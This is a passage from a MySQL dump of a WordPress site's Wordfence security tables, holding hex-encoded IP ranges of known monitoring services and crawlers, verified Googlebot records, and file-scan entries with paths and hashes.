36392e36332e3137362e305c2f3230222c2236392e36332e3137362e305c2f3231222c2236392e36332e3138342e305c2f3231222c2236362e3232302e3134342e305c2f3230222c2236392e36332e3137362e305c2f3230222c22323632303a303a316330303a3a5c2f3430222c22326130333a323838303a3a5c2f3332222c22326130333a323838303a666666653a3a5c2f3438222c22326130333a323838303a666666663a3a5c2f3438222c22323632303a303a316366663a3a5c2f3438222c22326130333a323838303a663030303a3a5c2f3438222c22326130333a323838303a663030313a3a5c2f3438222c22326130333a323838303a663030323a3a5c2f3438222c22326130333a323838303a663030333a3a5c2f3438222c22326130333a323838303a663030343a3a5c2f3438222c22326130333a323838303a663030353a3a5c2f3438222c22326130333a323838303a663030363a3a5c2f3438222c22326130333a323838303a663030373a3a5c2f3438222c22326130333a323838303a663030383a3a5c2f3438222c22326130333a323838303a663030393a3a5c2f3438222c22326130333a323838303a663030613a3a5c2f3438222c22326130333a323838303a663030623a3a5c2f3438222c22326130333a323838303a663030633a3a5c2f3438222c22326130333a323838303a663030643a3a5c2f3438222c22326130333a323838303a663030653a3a5c2f3438222c22326130333a323838303a663030663a3a5c2f3438222c22326130333a323838303a663031303a3a5c2f3438222c22326130333a323838303a663031313a3a5c2f3438222c22326130333a323838303a663031323a3a5c2f3438222c22326130333a323838303a663031333a3a5c2f3438222c22326130333a323838303a663031343a3a5c2f3438222c22326130333a323838303a663031353a3a5c2f3438222c22326130333a323838303a663031363a3a5c2f3438222c22326130333a323838303a663031373a3a5c2f3438222c22326130333a323838303a663031383a3a5c2f3438222c22326130333a323838303a663031393a3a5c2f3438222c22326130333a323838303a663031613a3a5c2f3438222c22326130333a323838303a663031623a3a5c2f3438222c22326130333a323838303a663031633a3a5c2f3438222c22326130333a323838303a663031643a3a5c2f3438222c22326130333a323838303a663031653a3a5c2f3438222c22326130333a323838303a663031663a3a5c2f3438222c22326130333a323838303a313030303a3a5c2f3336222c22326130333a323838303a323030303a3a5c2f3336222c22326130333a323838303a333030303a3a5c2f3336222c22326130333a323838303a343030303a3a5c2f3336222c22326130333a323838303a353030303a3a5c2f3336222c22326130333a323838303a363030303a3a5c2f3336222c22326130333a323838303a373030303a3a5c2f3336222c22326130333a323838303a663032303a3a5c2f3438222c22326130333a323838303a663032313a3a5c2f3438222c22326130333a323838303a663032323a3a5c2f3438222c22326130333a323838303a663032333a3a5c2f3438222c22326130333a323838303a663032343a3a5c2f3438222c22326130333a323838303a663032353a3a5c2f3438222c22326130333a323838303a663032363a3a5c2f3438222c22326130333a323838303a663032373a3a5c2f3438222c22326130333a323838303a663032383a3a5c2f3438222c22326130333a323838303a663032393a3a5c2f3438222c22326130333a323838303a663032623a3a5c2f3438222c22326130333a323838303a663032633a3a5c2f3438222c22326130333a323838303a663032643a3a5c2f3438222c22326130333a323838303a663032653a3a5c2f3438222c22326130333a323838303a663032663a3a5c2f3438222c22326130333a323838303a663033303a3a5c2f3438222c22326130333a323838303a663033313a3a5c2f3438222c22326130333a323838303a663033323a3a5c2f3438222c22326130333a323838303a663033333a3a5c2f3438222c22326130333a323838303a663033343a3a5c2f3438222c22326130333a323838303a663033353a3a5c2f3438222c22326130333a323838303a663033363a3a5c2f3438222c22326130333a323838303a663033373a3a5c2f3438222c22326130333a323838303a663033383a3a5c2f3438222c22326130333a323838303a663033393a3a5c2f3438222c22326130333a323838303a663033613a3a5c2f3438222c22326130333a323838303a663033623a3a5c2f3438222c22326130333a323838303a663033633a3a5c2f3438222c22326130333a323838303a663033643a3a5c2f3438222c22326130333a323838303a663033653a3a5c2f3438222c22326130333a323838303a663033663a3a5c2f3438222c22323430313a646230303a3a5c2f3332222c22326130333a323838303a3a5c2f3336222c22323830333a363038303a3a5c2f3332222c22326130333a323838303a663130303a3a5c2f3438222c22326130333a323838303a663230303a3a5c2f3438222c22326130333a323838303a663130313a3a5c2f3438222c22326130333a323838303a663230313a3a5c2f3438222c22326130333a323838303a663130323a3a5c2f3438222c22326130333a323838303a663230323a3a5c2f3438222c22326130333a323838303a663130333a3a5c2f3438222c22326130333a323838303a663230333a3a5c2f3438222c22326130333a323838303a663130343a3a5c2f3438222c22326130333a323838303a663230343a3a5c2f3438222c22326130333a323838303a663130373a3a5c2f3438222c22326130333a323838303a663230373a3a5c2f3438222c22326130333a323838303a663130383a3a5c2f3438222c22326130333a323838303a663230383a3a5c2f3438222c22326130333a323838303a663130393a3a5c2f3438222c22326130333a323838303a663230393a3a5c2f3438222c22326130333a323838303a663130613a3a5c2f3438222c22326130333a323838303a663230613a3a5c2f3438222c22326130333a323838303a663130623a3a5c2f3438222c22326130333a323838303a663230623a3a5c2f3438222c22326130333a323838303a663130643a3a5c2f3438222c22326130333a323838303a663230643a3a5c2f3438222c22326130333a323838303a663130653a3a5c2f3438222c22326130333a323838303a663230653a3a5c2f3438222c22326130333a323838303a663130663a3a5c2f3438222c22326130333a323838303a663230663a3a5c2f3438222c22326130333a323838303a663131303a3a5c2f3438222c22326130333a323838303a663231303a3a5c2f3438222c22326130333a323838303a663131313a3a5c2f3438222c22326130333a323838303a663231313a3a5c2f3438222c22326130333a323838303a663131323a3a5c2f3438222c22326130333a323838303a663231323a3a5c2f3438222c22326130333a323838303a663131343a3a5c2f3438222c22326130333a323838303a663231343a3a5c2f3438222c22326130333a323838303a663131353a3a5c2f3438222c22326130333a323838303a663231353a3a5c2f3438222c22326130333a323838303a663131363a3a5c2f3438222c22326130333a323838303a663231363a3a5c2f3438222c22326130333a323838303a663131373a3a5c2f3438222c22326130333a323838303a663231373a3a5c2f3438222c22326130333a323838303a663131383a3a5c2f3438222c22326130333a323838303a663231383a3a5c2f3438222c22326130333a323838303a663131393a3a5c2f3438222c22326130333a323838303a663231393a3a5c2f3438222c22326130333a323838303a663131613a3a5c2f3438222c22326130333a323838303a663231613a3a5c2f3438222c22326130333a323838303a663131663a3a5c2f3438222c22326130333a323838303a663231663a3a5c2f3438222c22326130333a323838303a663132313a3a5c2f3438222c22326130333a323838303a663232313a3a5c2f3438222c22326130333a323838303a663132323a3a5c2f3438222c22326130333a323838303a663232323a3a5c2f3438222c22326130333a323838303a663132333a3a5c2f3438222c22326130333a323838303a663232333a3a5c2f3438222c22326130333a323838303a663130633a3a5c2f3438222c22326130333a323838303a663230633a3a5c2f3438222c22326130333a323838303a663132363a3a5c2f3438222c22326130333a323838303a663232363a3a5c2f3438222c22326130333a323838303a663130353a3a5c2f3438222c22326130333a323838303a663230353a3a5c2f3438222c22326130333a323838303a663132353a3a5c2f3438222c22326130333a323838303a663232353a3a5c2f3438222c22326130333a323838303a663130363a3a5c2f3438222c22326130333a323838303a663230363a3a5c2f3438222c22326130333a323838303a663131623a3a5c2f3438222c22326130333a323838303a663231623a3a5c2f3438222c22326130333a323838303a663131333a3a5c2f3438222c22326130333a323838303a663231333a3a5c2f3438222c22326130333a323838303a663131633a3a5c2f3438222c22326130333a323838303a663231633a3a5c2f3438222c22326130333a323838303a663132383a3a5c2f3438222c22326130333a323838303a663232383a3a5c2f3438222c22326130333a323838303a663032613a3a5c2f3438222c22326130333a323838303a663132613a3a5c2f3438222c22326130333a323838303a663232613a3a5c2f3438222c22326130333a323838303a663132663a3a5c2f3438222c22326130333a323838303a663232663a3a5c2f3438222c22326130333a323838303a663131643a3a5c2f3438222c22326130333a323838303a663131653a3a5c2f3438222c22326130333a323838303a663132303a3a5c2f3438222c22326130333a323838303a663132343a3a5c2f3438222c22326130333a323838303a663132373a3a5c2f3438222c22326130333a323838303a663132393a3a5c2f3438222c22326130333a323838303a663132623a3a5c2f3438222c22326130333a323838303a663132633a3a5c2f3438222c22326130333a323838303a663132643a3a5c2f3438222c22326130333a323838303a663132653a3a5c2f3438222c22326130333a323838303a663133303a3a5c2f3438222c22326130333a323838303a663133313a3a5c2f3438222c22326130333a323838303a663133323a3a5c2f3438222c22326130333a323838303a663133333a3a5c2f3438222c22326130333a323838303a663133343a3a5c2f3438222c22326130333a323838303a663133353a3a5c2f3438222c22326130333a323838303a663133363a3a5c2f3438222c22326130333a323838303a663133373a3a5c2f3438222c22326130333a323838303a663133383a3a5c2f3438222c22326130333a323838303a663133393a3a5c2f3438222c22326130333a323838303a663133613a3a5c2f3438222c22326130333a323838303a663133623a3a5c2f3438222c22326130333a323838303a663133633a3a5c2f3438222c22326130333a323838303a663133643a3a5c2f3438222c22326130333a323838303a663133653a3a5c2f3438222c22326130333a323838303a663133663a3a5c2f3438222c22326130333a323838303a663231643a3a5c2f3438222c22326130333a323838303a663231653a3a5c2f3438222c22326130333a323838303a663232303a3a5c2f3438222c22326130333a323838303a663232343a3a5c2f3438222c22326130333a323838303a663232373a3a5c2f3438222c22326130333a323838303a663232393a3a5c2f3438222c22326130333a323838303a663232623a3a5c2f3438222c22326130333a323838303a663232633a3a5c2f3438222c22326130333a323838303a663232643a3a5c2f3438222c22326130333a323838303a663232653a3a5c2f3438222c22326130333a323838303a663233303a3a5c2f3438222c22326130333a323838303a663233313a3a5c2f3438222c22326130333a323838303a663233323a3a5c2f3438222c22326130333a323838303a663233333a3a5c2f3438222c22326130333a323838303a663233343a3a5c2f3438222c22326130333a323838303a663233353a3a5c2f3438222c22326130333a323838303a663233363a3a5c2f3438222c22326130333a323838303a663233373a3a5c2f3438222c22326130333a323838303a663233383a3a5c2f3438222c22326130333a323838303a663233393a3a5c2f3438222c22326130333a323838303a663233613a3a5c2f3438222c22326130333a323838303a663233623a3a5c2f3438222c22326130333a323838303a663233633a3a5c2f3438222c22326130333a323838303a663233643a3a5c2f3438222c22326130333a323838303a663233653a3a5c2f3438222c22326130333a323838303a663233663a3a5c2f3438222c22326130333a323838303a663066663a3a5c2f3438222c22326130333a323838303a663166663a3a5c2f3438222c22326130333a323838303a663266663a3a5c2f3438222c22326330663a656637383a303030333a3a5c2f3438225d7d2c22757074696d65726f626f74223a7b226e223a22557074696d6520526f626f74222c2264223a747275652c2272223a5b2236392e3136322e3132342e3232345c2f3238222c2236332e3134332e34322e3234305c2f3238225d7d2c2273746174757363616b65223a7b226e223a2253746174757343616b65222c2264223a747275652c2272223a5b223130332e3139342e3131322e3730222c223130342e3133312e3234372e313531222c223130342e3133312e3234382e3635222c223130342e3133312e3234382e3738222c223130342e3135362e3232392e3234222c223130342e3135362e3235352e313834222c223130342e3230362e3136382e3236222c223130342e3233382e3136342e313035222c223130372e3135302e312e313335222c223130372e3135352e3130342e313832222c223130372e3135352e3130382e323334222c223130372e3135352e3132352e3239222c223130372e3136312e32382e323139222c223130372e3137302e3139372e323438222c223130372e3137302e3231392e3436222c223130372e3137302e3232372e3233222c223130372e3137302e3232372e3234222c223130372e3137302e3234302e313431222c223130372e3137302e35332e313931222c223130372e3139312e34372e313331222c223130372e3139312e35372e323337222c223130382e36312e3131392e313533222c223130382e36312e3136322e323134222c223130382e36312e3230352e323031222c223130382e36312e3231322e313431222c223130382e36312e3231352e313739222c223132352e36332e34382e323339222c223132382e3139392e3232322e3635222c223133382e3139372e3133302e323332222c223133382e3139372e3133302e323335222c223133382e3139372e3134302e323433222c223133382e3230342e3137312e313336222c223133382e36382e32342e313135222c223133382e36382e32342e313336222c223133382e36382e32342e323037222c223133382e36382e32342e3630222c223133382e36382e38302e3130222c223133382e36382e38302e313733222c223133392e35392e31352e3739222c223133392e35392e3135352e3236222c223133392e35392e3139302e323431222c223133392e35392e32322e313039222c223133392e35392e32362e3835222c223133392e35392e32392e313637222c223134392e3135342e3135372e3631222c223134392e3235352e35392e313030222c223135312e3233362e31302e323338222c223135312e3233362e31382e3830222c223135312e38302e3137352e323233222c223135312e38302e3137352e323236222c223135342e3132372e36302e3233222c223135342e3132372e36302e3539222c223135382e3235352e3230382e3736222c223135392e3230332e3138322e3232222c223135392e3230332e3138322e3630222c223135392e3230332e3138362e323235222c223135392e3230332e33312e3138222c223136322e3234332e3234372e313633222c223136322e3234332e37312e3536222c223136322e3234382e39372e3732222c223136322e3235332e36342e313034222c223136322e3235332e36342e3837222c223137362e35362e3233302e313130222c223137382e36322e3130312e3537222c223137382e36322e3130342e313337222c223137382e36322e3130362e3834222c223137382e36322e3130392e37222c223137382e36322e34302e323333222c223137382e36322e34312e3434222c223137382e36322e34312e3439222c223137382e36322e34312e3532222c223137382e36322e36352e313632222c223137382e36322e37312e323237222c223137382e36322e37382e313939222c223137382e36322e38302e3933222c223137382e36322e38362e3639222c223137382e37332e3231302e3939222c223138312e34312e3230312e313137222c223138312e34312e3231342e313337222c223138352e3131322e3135372e313835222c223138352e31322e34352e3730222c223138352e34372e3132392e313638222c223138352e36302e3133352e3836222c223138382e3136362e3135382e323234222c223138382e3136362e3235332e313438222c223138382e3232362e3133392e313538222c223138382e3232362e3135382e313630222c223138382e3232362e3136392e323238222c223138382e3232362e3137312e3538222c223138382e3232362e3138342e313532222c223138382e3232362e3138352e313036222c223138382e3232362e3138362e313939222c223138382e3232362e3230332e3834222c223138382e3232362e3234372e313834222c223138382e36382e3233382e3739222c223139322e3234312e3232312e3131222c223139332e3132342e3137382e3534222c223139332e3132342e3137382e3631222c223139332e3138322e3134342e313035222c223139332e3138322e3134342e313437222c223139392e3136372e3132382e3830222c223230392e3232322e33302e323432222c223231332e3138332e35362e313037222c223231372e3134382e34332e313838222c223231372e3134382e34332e323032222c2233312e3232302e372e323337222c2233372e3135372e3234362e313436222c2233372e3233352e34382e3432222c2233372e3233352e35322e3235222c2233372e3233352e35332e323430222c2233372e3233352e35352e323035222c2233372e39372e3138382e313033222c2234352e33322e3132382e3830222c2234352e33322e3134352e3739222c2234352e33322e3135312e3231222c2234352e33322e3136302e313732222c2234352e33322e3136362e313935222c2234352e33322e3137312e3234222c2234352e33322e3139322e313938222c2234352e33322e3139352e313836222c2234352e33322e3139352e3933222c2234352e33322e3231322e3536222c2234352e33322e33362e313538222c2234352e33322e372e3232222c2234352e36332e3132312e313539222c2234352e36332e32362e3738222c2234352e36332e35312e3633222c2234352e36332e36312e323133222c2234352e36332e37362e3638222c2234352e36332e37382e3834222c2234352e36332e38362e313230222c2234352e36332e38382e323133222c2234352e37362e312e3434222c2234352e37362e3139322e3530222c2234352e37362e332e313132222c2234362e3130312e302e3234222c2234362e3130312e3131302e3332222c2234362e3130312e3131302e3433222c2234362e3130312e3131302e3435222c2234362e3130312e32302e3936222c2234362e3130312e3233382e313832222c2234362e3130312e3233382e313839222c2234362e3130312e3234302e323038222c2234362e3130312e32372e313836222c2234362e3130312e36312e3833222c2234362e3130312e37342e323531222c22352e34352e3137392e313033222c2235302e322e3133392e3136222c2238322e3232312e39352e313631222c2239312e3233362e3131362e313633225d7d2c226d616e6167657770223a7b226e223a224d616e6167655750222c2264223a66616c73652c2272223a5b2233342e3231312e3138302e3636222c2235342e37302e36352e313037222c2233342e3231302e3232342e37222c2235322e34312e352e313038222c2235322e33352e37322e313239222c2235342e3139312e3133372e3137222c2233352e3136322e3235342e323533222c2235322e31312e31322e323331222c2235322e31312e32392e3730222c2235322e31312e35342e313631222c2235322e32342e3134322e313539222c2235322e32352e3139312e323535222c2235322e32372e3138312e313236222c2235322e33342e3132362e313137222c2235322e33342e3235342e3437222c2235322e33352e38322e3939222c2235322e33362e32382e3830222c2235322e33382e3130362e3937222c2235322e33392e3137372e313532222c2235322e34312e3233302e313438222c2235322e34312e3233372e3132222c2235322e34322e3132362e313636222c2235322e34332e31332e3731222c2235322e34332e37362e323234222c2235322e38382e39362e313130222c2235322e38392e3135352e3531222c2235342e3134382e37332e313138222c2235342e3138362e33372e313035222c2235342e3138372e39322e3537222c2235342e3139312e33322e3635222c2235342e3139312e36372e3233222c2235342e3139312e38302e313139222c2235342e3139312e3133352e323039222c2235342e3139312e3133362e313736222c2235342e3139312e3134382e3835222c2235342e3139312e3134392e38222c2235322e32362e3132322e3231222c2235322e32342e3138372e3239222c2235322e38392e38352e313037222c2235342e3138362e3132382e313637222c2235342e3139312e34302e313336222c2235322e32342e36322e3131222c2235322e38382e3131392e313232222c2235342e3139312e3134382e323235222c2235342e3139312e3135312e3138222c2235322e38392e39342e313231222c2235322e32352e3131362e313136222c2235322e38382e3231352e323235222c2235342e3138362e3134332e313834222c2235322e38382e3139372e313830222c2235322e32372e3137312e313236225d7d2c2273657a6e616d223a7b226e223a2253657a6e616d2053656172636820456e67696e65222c2264223a747275652c2272223a5b2237372e37352e37342e305c2f3234222c2237372e37352e37362e305c2f3234222c2237372e37352e37372e305c2f3234222c2237372e37352e37382e305c2f3234222c2237372e37352e37392e305c2f3234222c22326130323a3539383a613a3a37383a305c2f313132222c22326130323a3539383a613a3a37393a305c2f313132222c22326130323a3539383a323a3a305c2f3936225d7d7d, 'yes'),
('wp_home_url', 0x687474703a2f2f7777772e7a652d64656e742e636f6d, 'yes'),
('wp_site_url', 0x687474703a2f2f7777772e7a652d64656e742e636f6d, 'yes');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfcrawlers`
--

CREATE TABLE `zdenl_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) UNSIGNED NOT NULL,
  `PTR` varchar(255) DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wfcrawlers`
--

INSERT INTO `zdenl_wfcrawlers` (`IP`, `patternSig`, `status`, `lastUpdate`, `PTR`) VALUES
(0x00000000000000000000ffff42f94044, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596407415, 'crawl-66-249-64-68.googlebot.com'),
(0x00000000000000000000ffff42f94054, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596434407, 'crawl-66-249-64-84.googlebot.com'),
(0x00000000000000000000ffff42f94055, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596591196, 'crawl-66-249-64-85.googlebot.com'),
(0x00000000000000000000ffff42f94056, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596381796, 'crawl-66-249-64-86.googlebot.com'),
(0x00000000000000000000ffff42f94057, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596577839, 'crawl-66-249-64-87.googlebot.com'),
(0x00000000000000000000ffff42f94058, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596381795, 'crawl-66-249-64-88.googlebot.com'),
(0x00000000000000000000ffff42f94059, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596566958, 'crawl-66-249-64-89.googlebot.com'),
(0x00000000000000000000ffff42f9405e, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596393540, 'crawl-66-249-64-94.googlebot.com'),
(0x00000000000000000000ffff42f94521, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596950292, 'crawl-66-249-69-33.googlebot.com'),
(0x00000000000000000000ffff42f94524, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596994147, 'crawl-66-249-69-36.googlebot.com'),
(0x00000000000000000000ffff42f9453e, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596956237, 'crawl-66-249-69-62.googlebot.com'),
(0x00000000000000000000ffff42f94615, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596394334, 'crawl-66-249-70-21.googlebot.com'),
(0x00000000000000000000ffff42f94617, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596407413, 'crawl-66-249-70-23.googlebot.com'),
(0x00000000000000000000ffff42f94619, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596533960, 'crawl-66-249-70-25.googlebot.com'),
(0x00000000000000000000ffff42f94b5a, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596956235, 'crawl-66-249-75-90.googlebot.com'),
(0x00000000000000000000ffff42f94b5b, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596994146, 'crawl-66-249-75-91.googlebot.com'),
(0x00000000000000000000ffff42f94b5c, 0x8bfc17c095903e8d6230ab6f51318cf6, 'verified', 1596950290, 'crawl-66-249-75-92.googlebot.com');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wffilechanges`
--

CREATE TABLE `zdenl_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wffilemods`
--

CREATE TABLE `zdenl_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) UNSIGNED NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wffilemods`
--

INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x000422bda8a87baa808f7315fb201c3a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/headquarters.svg', 0, 0x2191b4a32ac235887a3cdb3e3fb832d9, 0x2191b4a32ac235887a3cdb3e3fb832d9, 0xa329862e66dad9969274ef53cc9063268a813f0ad8e9a37b53bcf4a4ece790ae, '', 0, '?'),
(0x001e3f48ea00ca457dfdbfa6b3e722e2, 'wp-includes/sodium_compat/lib/namespaced.php', 1, 0x00000000000000000000000000000000, 0x30319dd5cee8f894766e479cac170da0, 0x5d2f721e7efacaba4f829b870243ee63a7784285806a2feb6fb59855d9492ad9, '', 0, '?'),
(0x00216cb62c1a5c1a5cac7a5037b2fde4, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/fixto.js', 0, 0x651d4b131d0cd2d832a79c0a0eb4340c, 0x651d4b131d0cd2d832a79c0a0eb4340c, 0x796d4f1f6ceef174a13df96238954293b8dfb2c922917caa98bec2dff6313e6d, '', 0, '?'),
(0x0030f6f123168a39fd9cac5a34ce6a24, 'wp-admin/network/user-edit.php', 1, 0x00000000000000000000000000000000, 0x030bb6ad3f1c614f7f1aa7fd27b79509, 0x8413076e461d07e38f23a8ec921bb55601187d1af85e9a4cc7d34b75b690f88a, '', 0, '?'),
(0x003567c0cbcfeaab9463178b30892244, 'wp-includes/css/media-views-rtl.css', 1, 0x00000000000000000000000000000000, 0xaa26cc77c06589e911cab9b7a0e1f948, 0xcd93def89f26fe8f62155f29c3dba4e6bb861302abf76d8d245f68090e0cdd4a, '', 0, '?'),
(0x003629450e445158f46e1907d6f00e57, 'wp-content/plugins/js_composer/config/grids/vc-grids-functions.php', 0, 0x7a86b4ea032964dfea14186fc32f576a, 0x7a86b4ea032964dfea14186fc32f576a, 0xc9f364650727f522830106fbe1a8a4b2a089e81632b147cca9181362da3666a2, '', 0, '?'),
(0x003f5bf7ec165864b632fd2c96334951, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/class-vc-gitem-woocommerce-shortcode.php', 0, 0xac9a074dedce4909fbdb1f4acfc1b1d2, 0xac9a074dedce4909fbdb1f4acfc1b1d2, 0x65afe6edf95e776092b0cb9dda5678694ebc6af03d37a0aa9bdaacfc4fc2b94c, '', 0, '?'),
(0x00435f0a7f08ecc2146a440ba8e9406b, 'wp-admin/network/index.php', 1, 0x00000000000000000000000000000000, 0x6f86ac8194ca0fd98b99b044394e2d06, 0x772e05f635928a105ce44f8163bf24187c551e143995debac5967756f263ae31, '', 0, '?'),
(0x0047b8a5e04d28e70fd2596c577ae321, 'wp-includes/sodium_compat/src/Core/X25519.php', 1, 0x00000000000000000000000000000000, 0x705afa98a3cb02c43a03218419d9bcd1, 0x33edb36ca640d9e499fa976fa32dc93319f61596fd53a6cce0d58f26ca219dd0, '', 0, '?'),
(0x00601b59b1cfad7216471da606a69484, 'wp-includes/SimplePie/Restriction.php', 1, 0x00000000000000000000000000000000, 0x2a191e7168116418817388113bd57914, 0xfbbed275e2d25cd7d7d40c03895169e7aa8d67bb9c8744174809053b0500c7cc, '', 0, '?'),
(0x008cfee63b66f31bfa51ee3d2ac795c3, 'wp-includes/js/wp-emoji.js', 1, 0x00000000000000000000000000000000, 0xbd3c01dbc3b971ea143a6a4628400dba, 0x92eac32d768828187ad94cd02d265d137e13a375751cd198a36a311ce555caf3, '', 0, '?'),
(0x008eceae3b64873c4e3ff1bcc5e1bdc0, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_room_service_24px.svg', 0, 0x9c11248fc3c2214dcb6b191e28d7f985, 0x9c11248fc3c2214dcb6b191e28d7f985, 0x3fd8dab96926ac75e3e2561927ffdc43a9a8f2fb0d47afa6ade154455a220ff4, '', 0, '?'),
(0x00994f98972e62450540fb7343401a4a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award3.svg', 0, 0xa57fc89a4bff1a4e363927d0c226084b, 0xa57fc89a4bff1a4e363927d0c226084b, 0x032c010ba808ba0ff5a64bc1bf80e71fb844c551cafcc06378fe7fefa430ee6d, '', 0, '?'),
(0x009a5da282ebed256eb248e25a64d3e5, 'wp-content/themes/Impreza/framework/templates/elements/post_content.php', 0, 0x553cf3936b947abc9f54b71423300c33, 0x553cf3936b947abc9f54b71423300c33, 0x5b09eddafbf6ed1d048a28fd261e53bce1fe3fccdcb81ff12fe2a93818e5de4c, '', 0, '?'),
(0x009c4dc0700e5c064492fae2cb64a900, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-add-element.tpl.php', 0, 0xbc8e33c82160c20221a29f247fa3f400, 0xbc8e33c82160c20221a29f247fa3f400, 0x621d4af11c12af1ff4ee9039d69d2a1235333107165ada34aaaaab8d6bb8e1fd, '', 0, '?'),
(0x009e39f3bf6b3505261ee5d99920374e, 'wp-includes/sodium_compat/src/Core32/Curve25519.php', 1, 0x00000000000000000000000000000000, 0x4dc26bdda24199dbfd44ac357afa796a, 0x14421c51a965218b52b1696c98d073cc6e71a1d252343178eba478ea85511321, '', 0, '?'),
(0x00c77c39e8d7758565e4f1e1964083b5, 'wp-admin/includes/image.php', 1, 0x00000000000000000000000000000000, 0xf27e2f8f6977dc130433cbc18c061386, 0xd94d596e2596f1b1fcb6eff4079b93e9a16c4624c67a1d54a3370bb136fad3c3, '', 0, '?'),
(0x00cb071d1707106ec8c3d37ea36a1943, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_feedback_24px.svg', 0, 0x3fd399604519431809a090a52d2cea70, 0x3fd399604519431809a090a52d2cea70, 0x6333080d1606106d1670690932f05338147face23b68c8de096dc9107f7afa12, '', 0, '?'),
(0x00d01344f860f83852a6c7c9b2258186, 'wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php', 1, 0x00000000000000000000000000000000, 0x979dd27de9e06069bde6c279f48d96c8, 0xdcc4dc54dcafb6f89ceb31395e9dd5bbbd5027844ca064251bf26b7cd750d89e, '', 0, '?'),
(0x00d5a0da13f9de924128b7f63d870063, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-cta-button2.php', 0, 0x0fd01559643fc84feb064717583b74e1, 0x0fd01559643fc84feb064717583b74e1, 0x9956697a9651fb24be72b4452c03a6ffb4e53451d49fceb6ec5279dbce49096a, '', 0, '?'),
(0x00d6c2c2cd87c401e5f8307ae9afaf78, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-qtranslate.php', 0, 0xf17a99c8e09d305d73f5b0c5bc59f781, 0xf17a99c8e09d305d73f5b0c5bc59f781, 0x644631accc6060851d9071694c581c47e6eeddcc4101b540e7ead1cda6050b7f, '', 0, '?'),
(0x00e46c446483d3fd755ee2e159ace2a4, 'wp-admin/user/privacy.php', 1, 0x00000000000000000000000000000000, 0x27ddd7bc6e0da6fac87f279bff299bb3, 0xbae69d71a74f5875feed41b38d4792a602fb1d1a405955326a2ec8d507105b50, '', 0, '?'),
(0x01060d782ba655e1f7e1da9cdd1893bc, 'wp-includes/css/dist/list-reusable-blocks/style.min.css', 1, 0x00000000000000000000000000000000, 0x720f7773fc0b0a8d79d4f3fc89658c1e, 0x7ff262555841b3eccefc36ae57d50a3e6a2e437d149304ab4cf4a9d42527a2fe, '', 0, '?'),
(0x0109348bf272764858614b1d70174a94, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-excerpt.php', 0, 0x560127b196fc5741aa7554e7d2bcb331, 0x560127b196fc5741aa7554e7d2bcb331, 0x7c03c885c1c69fa628cd58ec60fa1a36910d052ceb9fe47ecde61c8fee60e272, '', 0, '?'),
(0x010e9d390462ee08c4cefdbab808d3a2, 'wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wbpakeryshortcodefishbones.php', 0, 0x37ea58c847cd3088791e995f53805745, 0x37ea58c847cd3088791e995f53805745, 0x605d598a7061878a365cc4b6100427152149a0994a9d54a38cfadf8889837d78, '', 0, '?'),
(0x0115202eb5732235c7d48978b0926348, 'wp-content/plugins/js_composer/include/params/custom_markup/custom_markup.php', 0, 0x0318916ac1d4adc5b8379a3f6c127d2e, 0x0318916ac1d4adc5b8379a3f6c127d2e, 0xd0ddf5fdfb65df7ce50237c3aa1820b4ae9f3af4c4100c346683a62dd5f4a5f1, '', 0, '?'),
